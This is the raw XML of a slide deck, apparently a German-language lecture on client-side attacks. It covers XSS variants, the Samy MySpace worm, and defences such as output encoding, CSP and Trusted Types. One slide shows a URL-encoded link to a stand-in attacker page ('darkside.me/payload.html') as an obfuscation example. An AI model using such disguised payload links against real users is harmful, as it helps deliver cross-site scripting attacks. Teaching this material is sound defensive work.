        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="620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Context-Sensitive Output Encoding and Sanitization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Trusted Types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49019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030743"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="620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Context-Sensitive Output Encoding and Sanitization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Trusted Types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2380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0638430"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="620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/>
                        <a:t>Context-Sensitive Output Encoding and Sanitization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CSP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Trusted Types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/>
                        <a:t>A03:2021-Injection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4402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AAF8DC-FDF0-4026-AFB7-25D41B85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Nice real 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F4854F-9E3F-4A5F-A200-E2199280D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AT" dirty="0"/>
              <a:t>Samy / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>JS.Spacehero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MySpace Worm</a:t>
            </a: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2005</a:t>
            </a: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Fastest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>spreading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>worm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times</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>&gt; 1.000.000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>hours</a:t>
            </a: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2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>actions</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Posted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"but most of all, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is my hero" on the victims profile page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Added </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as friend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9381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D0519423-E8F5-48FA-B003-DAD6B695BD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426028" y="2632915"/>
            <a:ext cx="9339943" cy="24329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enough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33944348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07A30B8-51AF-4074-8842-DD2D30FBB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5" y="387240"/>
            <a:ext cx="5154791" cy="346201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B81917C-24D5-4B75-9852-B912CB8E3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036" y="387240"/>
            <a:ext cx="4772025" cy="157162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B7B134D-035E-44D9-9AFF-414F01937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02012"/>
            <a:ext cx="12192000" cy="8821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FEFBB3-5236-4AD1-8471-3F8CCD68B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618" y="2755988"/>
            <a:ext cx="56959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466217A-C3E2-44CB-8622-08459457D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142" y="3564667"/>
            <a:ext cx="6568802" cy="277424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229D77C-4398-49BB-8434-A06845582E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600218" y="2476438"/>
            <a:ext cx="11134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dirty="0"/>
              <a:t>%68%74%74%70%3a%2f%2f%64%61%72%6b%73%69%64%65%2e%6d%65%2f%70%61%79%6c%6f%61%64%2e%68%74%6d%6c</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>http://darkside.me/payload.html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22A58B-5671-4431-AE65-F5520B3B79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800"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1261367"/>
            <a:ext cx="12192000" cy="77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2838797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24952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3434742" y="1765162"/>
            <a:ext cx="575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/forum/foverview.php?uname=Luke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5414312-107F-4C04-A0A1-EF920D8FE92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228562" y="3987241"/>
            <a:ext cx="5983812" cy="1257422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9B82132-08BE-4E9B-9C4E-BA5DC11AFC8B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7032657-719E-4411-8349-89AA04CA906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6D6A1EA0-8891-4987-A7D7-D5FDCC330DD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45448955-E264-429B-9F2C-3E358734697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38FF78AB-8CDB-4238-A915-44C4A622A9F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C9AA9E1B-2F80-4541-ACFE-B2AC1BF3908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6EAA80DC-747F-4595-9D68-BDD45FCCE80B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6EE59968-5BC7-475F-A149-0C109B02C192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958AADC3-FC03-4974-B11C-A3743A5C214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E5EC457-86EB-4C0A-A1E0-A9E96E9A5FED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7196FE07-B212-4DE2-A9CF-FA5A93C555AC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15ED04B1-5E56-4318-B055-4E34CC5649B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0BE29B4B-074B-43A0-BC46-6730408EC123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0463C0EC-8320-48DD-9B99-44CBD5F5300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9AF6E1F-1B24-4EB3-8C6E-795E14C701EE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C25825CB-212D-4123-B6A4-2DDBD288A904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FB835F08-091D-479B-907B-9854036CC940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9" name="Freihand 38">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A71227-C6DD-4EBF-B504-96F5BA66F6FD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E9A7DE9D-33E8-4C4A-A36B-041D4D638AFC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B879847-713C-4212-A128-DAB7E0707103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7" name="Freihand 36">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DEF27E8-0F60-4ABD-B7A8-7FC75CCC9AD2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8" name="Freihand 37">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3EB37A-1F5C-4A4B-9891-2C67B7ABDCE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741AE8EE-B3E1-4108-AF79-1EF5BC4B844C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87ABBCF6-1EB4-4CE8-9EF1-7D0B4CB95EC4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77D985C1-EAFD-4B62-B1E0-9FA57A7E6232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201504FF-E75E-477A-8F5F-3A1BB05A415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D1F21173-1922-4878-9D71-D9851743236E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B50C78A8-F6DF-47F8-BBDB-F01116F27CFA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190C4CC4-3317-4ACE-8A7A-6CB015167F49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81A954F8-A172-4BA7-B5DA-4DF23A898417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A53A078E-2CF4-4F9D-927B-58074C28F738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0F8968EA-5BA2-4C39-B06B-41EB84BBB60A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AAC073E5-F19B-4F3E-B6C3-FB984FF60F82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1AB8CEC2-83AD-4AE4-B495-DE287268FA46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56" name="Freihand 55">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76CF6A07-BEEB-4A2A-ACD0-5AE1DC78F597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E3DD5E38-A512-4466-BD76-91A4CE5D3605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A61B0323-E438-4FE7-B897-7F168DD499A5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97078374-161D-4B38-B6F7-FF5E7B2BBC0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A95A1219-FC1D-4C81-AD4F-CA50FE7FB9D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C46F5B54-5717-433A-85AD-B5BB44BC15F9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63" name="Freihand 62">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394B6F60-90BE-4099-9A59-404EF955F54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3A502A75-9F7C-47AA-8B11-FE785B529E27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65" name="Freihand 64">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89ED30A2-B10E-4AE3-A5BE-D9E6D93A030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31EA90E1-9733-47DC-866C-3B3E85402188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D22A17D2-E3F2-49A2-BE73-A173988CF714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6EE27F01-DFC3-49DB-BA42-DD4DC22D6296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8F6099D9-121B-4D94-A584-8F3C7B3757F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BD1AD322-EAD7-46BB-B425-8C372719EC29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441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308546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10884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418843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16235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1309844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439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581666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60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771891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Was </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
                        <a:t>kicked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Top 10 2017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623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4293440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Was </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
                        <a:t>kicked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Top 10 2017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en-US" sz="1800" dirty="0"/>
                        <a:t>Define an approach that ensures all data are explicitly validated. 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582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514F424-367F-484C-99EE-A10433F1A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60" y="684847"/>
            <a:ext cx="5697072" cy="253841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D646922-3257-494B-863A-AE9FD5C87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60" y="3508057"/>
            <a:ext cx="5697072" cy="25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9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11B61FC-BD17-4CD2-B868-F49192E5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248603"/>
            <a:ext cx="9553576" cy="348043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BD22156-64F0-4AD6-9F66-925F1CB6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688" y="3876673"/>
            <a:ext cx="6504623" cy="280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4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6279403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870086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413061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56652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3886980"/>
            <a:ext cx="4253553" cy="2592591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9A69FD5-C9BA-478D-99A3-681992EBA07A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C9BAA366-AF6D-4946-94B4-B2A80239E879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C5CAD1F-F130-4C57-81A1-54E2BF95B30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20603052-767B-4A8E-9378-C34AED14647D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2B18454C-65D3-4F9F-B69F-01004FD597A5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7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838615" y="547149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E303561-2809-4018-A4A1-8D43E7846174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6C01D7EE-F64A-4F37-A7AC-CDE68D757D3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8E66B253-78CF-426F-BBCD-6D8C0CDC7C23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18AF9096-0301-4CB1-A9E8-0681BDB75A25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D4C573B5-D355-4888-93FD-13CE773DD37C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9BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458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25046F34-AB03-407D-ACFE-A9BE9B0D4D6F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0246770D-FC90-415E-ADD4-01821FE77D45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B32F8C8-B476-446C-ADAA-493F8C479FD9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F38376E0-E5E5-45AE-8420-F43EE8E8477A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E77F98BA-76C7-493D-891B-349FD0EBEB82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2E085404-5C04-4A2B-B64D-B9DC7338E39C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C501CF93-3C6F-40A4-A21F-34699DE39470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5E0EF96-9BDD-4544-81DD-13856536C6A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9B67ADB9-E23E-4217-8C13-25877BE929C4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B78F58A-35BA-452B-8770-898424EB8F7F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825D0CE-8EE1-413E-A7B6-EFCBED9287CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="812335" y="995367"/>
            <a:ext cx="1361520" cy="318240"/>
            <a:chOff x="3729526" y="1005434"/>
            <a:chExt cx="1361520" cy="318240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2E1E8174-2710-4D91-A4D8-9AFF47E38E2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3729526" y="1005434"/>
              <a:ext cx="1055520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="1055520" cy="31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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3729526" y="1005434"/>
                  <a:ext cx="229320" cy="318240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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720526" y="996434"/>
                    <a:ext cx="24696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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3775966" y="1163834"/>
                  <a:ext cx="100440" cy="1584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767326" y="1154834"/>
                    <a:ext cx="11808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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4019326" y="1006874"/>
                  <a:ext cx="21600" cy="29916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010686" y="997874"/>
                    <a:ext cx="3924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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3973966" y="1096154"/>
                  <a:ext cx="119160" cy="12960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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964966" y="1087514"/>
                    <a:ext cx="1368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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4179526" y="1013354"/>
                  <a:ext cx="37440" cy="29700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4170526" y="1004354"/>
                    <a:ext cx="5508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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4094206" y="1089674"/>
                  <a:ext cx="177480" cy="33120"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4085206" y="1080674"/>
                    <a:ext cx="19512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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4294726" y="1167794"/>
                  <a:ext cx="118080" cy="11808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286086" y="1158794"/>
                    <a:ext cx="1357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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4423966" y="1165634"/>
                  <a:ext cx="57240" cy="108360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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414966" y="1156994"/>
                    <a:ext cx="7488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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4535926" y="1176794"/>
                  <a:ext cx="124920" cy="10908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526926" y="1168154"/>
                    <a:ext cx="14256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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4672006" y="1061234"/>
                  <a:ext cx="24120" cy="229320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4663366" y="1052594"/>
                    <a:ext cx="4176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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4706926" y="1144034"/>
                  <a:ext cx="78120" cy="140040"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4697926" y="1135394"/>
                    <a:ext cx="9576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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4830766" y="1146554"/>
                <a:ext cx="120960" cy="11592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22126" y="1137554"/>
                  <a:ext cx="138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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4994566" y="1115954"/>
                <a:ext cx="96480" cy="163080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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85926" y="1106954"/>
                  <a:ext cx="114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92D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="688966" y="840914"/>
            <a:ext cx="1555200" cy="87840"/>
            <a:chOff x="688966" y="840914"/>
            <a:chExt cx="155520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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="688966" y="914354"/>
                <a:ext cx="91440" cy="1440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9966" y="905354"/>
                  <a:ext cx="109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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="889846" y="886274"/>
                <a:ext cx="97200" cy="1368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1206" y="877634"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1107286" y="886994"/>
                <a:ext cx="109080" cy="1296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98286" y="878354"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1324366" y="876914"/>
                <a:ext cx="93600" cy="1044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15726" y="867914"/>
                  <a:ext cx="111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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1533886" y="882314"/>
                <a:ext cx="93600" cy="90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24886" y="873674"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1716046" y="878714"/>
                <a:ext cx="116640" cy="576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07406" y="870074"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1964446" y="857114"/>
                <a:ext cx="87840" cy="864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55806" y="848474"/>
                  <a:ext cx="105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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2154526" y="840914"/>
                <a:ext cx="89640" cy="1548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45886" y="831914"/>
                  <a:ext cx="1072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6A2667DA-1D0B-4736-91E9-C9DC245888FF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BBCA3EFC-F2B5-42B0-9949-D43006EE228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B81C4DA9-136E-46C3-A3F0-B8C6C8DAC68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55A3802D-697F-4F8B-A476-E55C74D1CD37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58A1CD34-CC25-4F15-87DB-7FACEA8C5BF8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583C8456-5B00-4034-A6C8-3FBA2143F17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34BBCCB0-CBCC-405C-BC8C-8A2C9B902D9E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BBD9F313-DF82-4312-9B46-B2F844935EB2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D4304B06-450B-46A9-9AE3-FDC548E6B226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7802B83-3074-4DF2-81F1-E9E16F1E45BE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571C1EF-94F3-4183-ABE1-E22628A2CE8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086AD85D-A484-45F4-AB7C-032EC876B82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B6473CC8-DA6A-40B5-963E-1CC1F2E957B5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0804778E-0B2E-400D-8AE3-45B4685E2BD3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8EFD220-4219-466A-839C-7F271210422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1D2F212D-031B-4156-AEEE-46E159A2626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003A127A-3C1F-4CCF-A522-4F0CD6AD13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B051F1B6-8119-4B16-AACF-553D67C24C67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BA88B18C-04FD-4C9D-896F-1727EB892E4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858AB5DD-D9A8-47E0-B345-76CDA57C5F4C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97ED851-5B73-4766-882E-C8C37C6BC7B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51A612FD-57EE-4D98-913E-1B6C23FB26B6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7916D1A2-F1C5-45D8-95B0-DE23951564BC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1D75CC5-1E48-48F8-B234-9018A38E1BDF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9480245B-8A91-4863-BB1B-3CB7337B823B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E4504C9-A1D0-4EB3-9ED6-DD5168D4043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B4DA493-72A3-410E-9AC1-49594BB1C12D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AAABE017-CEF5-4512-A009-23B4482A02B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69D103B-06A7-4EE0-A767-2624CC701B5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1078580-5FF5-414E-B639-1A7F42CC8FF6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37BE4153-B593-4825-A1BA-F435F895606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5269D2B6-5480-4E38-A7B5-EC24A9642B4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A1F6BD4D-91DB-4ADA-AF53-95B9C4C73A5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8A1EA4CD-D130-4C70-B1F4-4394F1D2F86B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D2BDCB6A-9BA9-4CF5-9423-AB0ACE1D1F1E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28774F24-3F73-4150-9B7A-C39560B31D70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E1FA404D-2C3B-46A4-8821-E9D5ACD6806F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0AB5A588-4827-4226-B7F3-FF87F2CD9A1B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B060D84E-942D-4EA3-9596-E5037D79E6A3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B4063F82-0065-48E4-AF00-0EE47FF490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0D0DC01E-4FED-48D4-AB08-344DC5B08926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E7D38EF3-1DAC-4DD6-A409-A9B9CDB4B490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DBD0400-3885-4E69-AD13-2C7DAEF8D8D2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D9116B87-0066-4D46-A1BC-E2F0E8E8F98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4E41B52F-580D-4C8C-B7A3-3665A2B63619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7CF079E4-1E21-498E-8EFD-F2F62723981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2D2533E-B2DA-4631-AD15-77A50FDE64A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64FAF5DD-D5D8-4380-BA87-4C0D936E0B89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30648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8332533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24479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371574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 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my-trusted-partner.com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59833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7699154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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT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 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my-trusted-partner.com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Earn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or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give</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0"/>
                        <a:t>, but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assume</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
                        <a:t>trust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300443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D0DB78-AB5E-4845-BDA8-57563707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de-DE" dirty="0" err="1"/>
              <a:t>messages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E49D1-00A0-443D-BE62-56F93D3B9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just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servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and backend</a:t>
            </a:r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clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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weapon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fight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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>sanitize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3436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2D16BAF-1448-4321-AB02-8FF30EB9C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" t="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3121642" y="31531"/>
            <a:ext cx="5948715" cy="682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6CF0350-8ADD-4B77-8937-7CFC4FA7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607" y="1227740"/>
            <a:ext cx="7592786" cy="18728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47921D4-31E1-497F-B4E2-C6420CBD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332" y="3757449"/>
            <a:ext cx="5677336" cy="15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6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4506</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>924</Paragraphs>
  <Slides>84</Slides>
  <Notes>42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84</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="89" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>(Remaining) Client-side Attacks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Why is that even necessary?</vt:lpstr>
      <vt:lpstr>Same Origin Policy to the rescue!</vt:lpstr>
      <vt:lpstr>Remember SOP from previous chapter?</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>Combination Stored + Client XSS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mXSS (mutation-based)</vt:lpstr>
      <vt:lpstr>mXSS (mutation-based) - 2019</vt:lpstr>
      <vt:lpstr>uXSS (universal XSS)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Context-Sensitive Output Encoding</vt:lpstr>
      <vt:lpstr>Context-Sensitive Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Sanitization</vt:lpstr>
      <vt:lpstr>Both also possible on client-side</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>HTTP Only Flag</vt:lpstr>
      <vt:lpstr>Trusted Types</vt:lpstr>
      <vt:lpstr>Trusted Types</vt:lpstr>
      <vt:lpstr>Trusted Types</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Nice real life example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Key messages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2022-11-09T21:32:30Z</dcterms:modified>
</cp:coreProperties>
</file>